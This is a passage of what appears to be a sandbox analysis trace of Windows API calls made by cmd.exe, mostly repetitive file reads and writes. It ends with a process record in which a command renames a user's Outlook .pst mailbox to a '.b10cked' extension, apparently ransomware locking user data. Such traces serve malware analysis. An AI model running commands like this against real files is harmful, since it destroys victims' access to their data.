_get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] GetFileType (hFile=0x4c) returned 0x1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] GetFileType (hFile=0x4c) returned 0x1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.103] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.103] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] GetFileType (hFile=0x4c) returned 0x1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, 
lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, 
lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.113] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.114] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0237.114] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] 
GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.115] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | 
out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, 
lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.117] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) 
returned 1 [0237.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.118] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] GetFileType (hFile=0x4c) returned 0x1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.119] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.119] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x32, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] GetFileType (hFile=0x4c) returned 0x1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] GetFileType (hFile=0x4c) returned 0x1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x32, 
lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x32, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.119] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.119] _close (_FileHandle=4) returned 0 [0237.119] FindNextFileW (in: hFindFile=0x3d0e50, lpFindFileData=0x2ef104 | out: lpFindFileData=0x2ef104) returned 0 [0237.120] GetLastError () returned 0x12 [0237.120] FindClose (in: hFindFile=0x3d0e50 | out: hFindFile=0x3d0e50) returned 1 [0237.120] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0237.120] _close (_FileHandle=3) returned 0 [0237.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.121] SetConsoleInputExeNameW () returned 0x1 [0237.121] GetConsoleOutputCP () returned 0x1b5 [0237.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.121] exit (_Code=0) Process: id = "652" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d60" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
